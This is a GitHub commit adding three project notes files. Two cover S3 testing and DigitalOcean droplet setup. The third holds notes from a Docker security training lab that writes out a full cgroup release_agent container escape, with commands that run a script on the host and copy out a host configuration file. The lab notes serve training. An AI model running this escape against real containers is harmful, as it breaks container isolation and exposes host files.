-
Notifications
You must be signed in to change notification settings - Fork 5
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #364 from Zarquan/20210211-zrq-notes
20210211 zrq notes
- Loading branch information
Showing
3 changed files
with
367 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| # | ||
| # <meta:header> | ||
| # <meta:licence> | ||
| # Copyright (c) 2021, ROE (http://www.roe.ac.uk/) | ||
| # | ||
| # This information is free software: you can redistribute it and/or modify | ||
| # it under the terms of the GNU General Public License as published by | ||
| # the Free Software Foundation, either version 3 of the License, or | ||
| # (at your option) any later version. | ||
| # | ||
| # This information is distributed in the hope that it will be useful, | ||
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | ||
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | ||
| # GNU General Public License for more details. | ||
| # | ||
| # You should have received a copy of the GNU General Public License | ||
| # along with this program. If not, see <http://www.gnu.org/licenses/>. | ||
| # </meta:licence> | ||
| # </meta:header> | ||
| # | ||
| #zrq-notes-time | ||
| #zrq-notes-indent | ||
| #zrq-notes-crypto | ||
| #zrq-notes-ansible | ||
| #zrq-notes-osformat | ||
| #zrq-notes-zeppelin | ||
| # | ||
|
|
||
| Target: | ||
|
|
||
| Test out the AWS S3 libraries in Hadoop with data in an Echo S3 account. | ||
|
|
||
| Result: | ||
|
|
||
| Work in progress .... | ||
|
|
||
|
|
||
|
|
||
| # | ||
| # Use the command line client to push data into our S3 account. | ||
| # Use the Hadoop libraries to query the data ... | ||
| # | ||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,96 @@ | ||
| # | ||
| # <meta:header> | ||
| # <meta:licence> | ||
| # Copyright (c) 2021, ROE (http://www.roe.ac.uk/) | ||
| # | ||
| # This information is free software: you can redistribute it and/or modify | ||
| # it under the terms of the GNU General Public License as published by | ||
| # the Free Software Foundation, either version 3 of the License, or | ||
| # (at your option) any later version. | ||
| # | ||
| # This information is distributed in the hope that it will be useful, | ||
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | ||
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | ||
| # GNU General Public License for more details. | ||
| # | ||
| # You should have received a copy of the GNU General Public License | ||
| # along with this program. If not, see <http://www.gnu.org/licenses/>. | ||
| # </meta:licence> | ||
| # </meta:header> | ||
| # | ||
| #zrq-notes-time | ||
| #zrq-notes-indent | ||
| #zrq-notes-crypto | ||
| #zrq-notes-ansible | ||
| #zrq-notes-osformat | ||
| #zrq-notes-zeppelin | ||
| # | ||
|
|
||
| Target: | ||
|
|
||
| InfraOps | ||
| https://www.diaxion.com/devops-vs-infraops-whats-difference/ | ||
|
|
||
| Setup a public DNS service that we can update. | ||
|
|
||
| Result: | ||
|
|
||
| Work in progress ... | ||
|
|
||
|
|
||
| Digital Ocean droplet | ||
| Name Hizzoria | ||
| Memory 1G | ||
| Disk 25G | ||
| OS Fedora 33 x64 | ||
| DataCenter LON1 | ||
| IPv4 46.101.32.198 | ||
| IPv6 2a03:b0c0:1:d0::b53:6001 | ||
|
|
||
| # ----------------------------------------------------- | ||
| # Check we can login with our ssh key. | ||
| #[user@desktop] | ||
|
|
||
| ssh root@46.101.32.198 \ | ||
| ' | ||
| date | ||
| hostname | ||
| ' | ||
|
|
||
| > Wed 10 Feb 13:22:40 UTC 2021 | ||
| > Hizzoria | ||
|
|
||
|
|
||
| # ----------------------------------------------------- | ||
| # Add the hostname to our local ssh config. | ||
| # Note the same name twice, hostname matching on the SSH client is case sensitive. | ||
| #[user@desktop] | ||
|
|
||
| gedit "${HOME}/.ssh/config" & | ||
|
|
||
| + Host Hizzoria hizzoria | ||
| + HostName 2a03:b0c0:1:d0::b53:6001 | ||
| + User root | ||
| + IdentityFile ~/.ssh/zrq.digitalocean.com.rsa | ||
| + ServerAliveInterval 60 | ||
| + ServerAliveCountMax 5 | ||
| + ControlPath ~/.ssh/aglais-%r@%h:%p | ||
| + ControlMaster auto | ||
| + ControlPersist 5m | ||
|
|
||
|
|
||
| # ----------------------------------------------------- | ||
| # Check we can login with the host name. | ||
| #[user@desktop] | ||
|
|
||
| ssh Hizzoria \ | ||
| ' | ||
| date | ||
| hostname | ||
| ' | ||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,227 @@ | ||
| # | ||
| # <meta:header> | ||
| # <meta:licence> | ||
| # Copyright (c) 2021, ROE (http://www.roe.ac.uk/) | ||
| # | ||
| # This information is free software: you can redistribute it and/or modify | ||
| # it under the terms of the GNU General Public License as published by | ||
| # the Free Software Foundation, either version 3 of the License, or | ||
| # (at your option) any later version. | ||
| # | ||
| # This information is distributed in the hope that it will be useful, | ||
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | ||
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | ||
| # GNU General Public License for more details. | ||
| # | ||
| # You should have received a copy of the GNU General Public License | ||
| # along with this program. If not, see <http://www.gnu.org/licenses/>. | ||
| # </meta:licence> | ||
| # </meta:header> | ||
| # | ||
| #zrq-notes-time | ||
| #zrq-notes-indent | ||
| #zrq-notes-crypto | ||
| #zrq-notes-ansible | ||
| #zrq-notes-osformat | ||
| #zrq-notes-zeppelin | ||
| # | ||
|
|
||
| IRIS security workshop | ||
| https://indico.cern.ch/event/1002953/ | ||
| https://docs.google.com/document/d/1StXC5bSCRvIIkfXUlAqFIOx5xP_2QZR7c8z-Ao0GMjo/edit#heading=h.2amy7goxxq79 | ||
|
|
||
|
|
||
| https://www.netfilter.org/projects/ulogd/index.html | ||
| https://github.com/grafana/loki | ||
|
|
||
| Notes scribbled down during a training sesson on Docker security. | ||
|
|
||
| connect to the machine using: | ||
| ○ host: iris.crp.kypo.muni.cz | ||
| ○ port: as given in the sheet with credentials - 50850 | ||
| ○ user: training | ||
|
|
||
| ssh -p 50850 training@iris.crp.kypo.muni.cz | ||
|
|
||
| ssh -p 50850 -o 'PubkeyAuthentication=no' training@iris.crp.kypo.muni.cz | ||
|
|
||
| First, create a directory cgrp in the tmp directory, mount the RDMA group controller there and create a child cgroup named x. | ||
|
|
||
| create a directory cgrp in the tmp directory | ||
|
|
||
|
|
||
| mkdir /tmp/cgrp | ||
|
|
||
|
|
||
| mount the RDMA group controller there | ||
| https://man7.org/linux/man-pages/man7/cgroups.7.html | ||
|
|
||
| mount -t cgroup -o rdma none /tmp/cgrp | ||
|
|
||
| create a child cgroup named x | ||
|
|
||
| mkdir /tmp/cgrp/x | ||
|
|
||
| How many files are in /tmp/cgrp/x? Submit it as your flag! | ||
|
|
||
| ls -1 /tmp/cgrp/x | ||
|
|
||
| cgroup.clone_children | ||
| cgroup.procs | ||
| notify_on_release | ||
| rdma.current | ||
| rdma.max | ||
| tasks | ||
|
|
||
|
|
||
| Then, you need to enable cgroup notifications release of the “x” cgroup by writing ___ to its notify_on_release file. | ||
|
|
||
| https://android.googlesource.com/kernel/common/+/android-3.18/Documentation/cgroups/cgroups.txt | ||
|
|
||
| If the notify_on_release flag is enabled (1) in a cgroup, then | ||
| whenever the last task in the cgroup leaves (exits or attaches to | ||
| some other cgroup) and the last child cgroup of that cgroup | ||
| is removed, then the kernel runs the command specified by the contents | ||
| of the "release_agent" file in that hierarchy's root directory, | ||
| supplying the pathname (relative to the mount point of the cgroup | ||
| file system) of the abandoned cgroup. This enables automatic | ||
| removal of abandoned cgroups. The default value of | ||
| notify_on_release in the root cgroup at system boot is disabled | ||
| (0). | ||
|
|
||
| Suggests the values 1 and 0 are enabled and disabled | ||
|
|
||
| Subsequently, you need to set the RDMA cgroup release agent to execute a /cmd script. You will do it by writing the /cmd script path on the host to the ____ file. | ||
|
|
||
| https://android.googlesource.com/kernel/common/+/android-3.18/Documentation/cgroups/cgroups.txt | ||
|
|
||
| "release_agent" file in that hierarchy's root directory, | ||
|
|
||
| If you want to change the value of release_agent: | ||
|
|
||
| echo "/sbin/new_release_agent" > /sys/fs/cgroup/rg1/release_agent | ||
|
|
||
| /tmp/cgrp/x/release_agent | ||
|
|
||
| /tmp/cgrp/x/realease_agent | ||
|
|
||
|
|
||
| First, to grab the container’s path on the host from the /etc/mtab file with the following command: | ||
|
|
||
| cat /etc/mtab | ||
| .... | ||
| /var/lib/docker/overlay2/l/C2AIYTTAJL6SDRETZ7R46PLEPQ: | ||
| /var/lib/docker/overlay2/l/7XN23O3EZVETGJOFQOTAOIFNAH: | ||
| /var/lib/docker/overlay2/l/NXKGYPBOMJS75KBHQ76JVPJ4HO: | ||
| /var/lib/docker/overlay2/l/JEGIPSBPCDUL5I3D5JNOAALNRJ: | ||
| /var/lib/docker/overlay2/l/4TQRZKZDQBQ45CWHKWWW54UALK: | ||
| /var/lib/docker/overlay2/l/NCHMR5W6CXJ7A2QL4PDA52Q6QG: | ||
| /var/lib/docker/overlay2/l/OLIW4OIOZPXG4N7TQ2JBKSQKTD: | ||
| /var/lib/docker/overlay2/l/M2DWC5O3RLWNLWLP77VV33AOKO: | ||
| /var/lib/docker/overlay2/l/Z37BRMJMO6ZZZZ3JVHIXDV4MYA: | ||
| /var/lib/docker/overlay2/l/4RZF3QUKXHZ7BUES7OSEH46RXD: | ||
| /var/lib/docker/overlay2/l/HHT4ISVHUXPGIWIBH5NFYOOXJB: | ||
| /var/lib/docker/overlay2/l/536UBHFNZSATTV6XHXYI77RKJ2: | ||
| /var/lib/docker/overlay2/l/L6PNOSWHHTHJKRZPCH2X4XIY2P: | ||
| /var/lib/docker/overlay2/l/A32DCJGGHM4FDPKJHIANXVVR2X, | ||
| upperdir=/var/lib/docker/overlay2/cc0ddbabfdb66ff3678a7ff67f85f543cace610513ec012929c9478599d77fb9/diff, | ||
| workdir=/var/lib/docker/overlay2/cc0ddbabfdb66ff3678a7ff67f85f543cace610513ec012929c9478599d77fb9/work, | ||
| xino=off 0 0 | ||
|
|
||
|
|
||
|
|
||
|
|
||
| sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | ||
|
|
||
| /var/lib/docker/overlay2/cc0ddbabfdb66ff3678a7ff67f85f543cace610513ec012929c9478599d77fb9/diff | ||
|
|
||
| host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) | ||
|
|
||
| Then, set the RDMA cgroup release agent to execute a /cmd script. | ||
|
|
||
| echo "$host_path/cmd" > /tmp/cgrp/release_agent | ||
|
|
||
| Therefore, the flag is /tmp/cgrp/realease_agent. | ||
|
|
||
|
|
||
| As your next step, you will create the /cmd script such that it will execute the desired command which you will write in the next task. | ||
|
|
||
| Which command will you write to /cmd so the desired command could be executed in the next task? Use it as your flag! | ||
|
|
||
| echo '#!/bin/sh' > /cmd | ||
|
|
||
|
|
||
| You are almost finished! You would like to read a file /etc/jenkins/pipeline-build.conf that contains information needed for another task - Task B. | ||
|
|
||
| Let the /cmd script execute your command and save its output into /output on the container. You should do it by specifying the full path of the output file on the host. Then, as your last preparatory step, grant the execution permission to all users. | ||
|
|
||
| What part of the command corresponds to the full path of the output file on the host? Use it as your flag! | ||
|
|
||
| cat > /cmd << EOF | ||
| #!/bin/sh | ||
| cat /etc/jenkins/pipeline-build.conf > $host_path/output | ||
| EOF | ||
|
|
||
| chmod a+x /cmd | ||
|
|
||
|
|
||
| Let's finally execute the attack! | ||
|
|
||
| You will do it by spawning a process that immediately ends inside the “x” child cgroup. Run the following command: | ||
|
|
||
| sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" | ||
|
|
||
| What is the port number mentioned in the file? Submit it as your flag! | ||
|
|
||
| cat /output | ||
|
|
||
| You can see the following content of the /etc/jenkins/pipeline-build.conf file: | ||
|
|
||
| node { | ||
| docker.withServer('tcp://10.20.30.49:2375') { | ||
| docker.image('ubuntu:latest').withRun('do_build') { | ||
| c -> sh "docker logs ${c.id}" | ||
| } | ||
| } | ||
| } | ||
|
|
||
|
|
||
| -------------- | ||
|
|
||
| echo 1 > /tmp/cgrp/notify_on_release | ||
| echo "$host_path/cmd" > /tmp/cgrp/release_agent | ||
|
|
||
| cat > /cmd << EOF | ||
| #!/bin/sh | ||
| cat /etc/jenkins/pipeline-build.conf > $host_path/output | ||
| EOF | ||
|
|
||
| chmod a+x /cmd | ||
|
|
||
| sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" | ||
|
|
||
| cat /output | ||
|
|
||
|
|
||
| -------------- | ||
|
|
||
| echo 1 > /tmp/cgrp/x/notify_on_release | ||
| echo "$host_path/cmd" > /tmp/cgrp/x/release_agent | ||
|
|
||
| cat > /cmd << EOF | ||
| #!/bin/sh | ||
| cat /etc/jenkins/pipeline-build.conf > $host_path/output | ||
| EOF | ||
|
|
||
| chmod a+x /cmd | ||
|
|
||
| sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" | ||
|
|
||
| cat /output | ||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|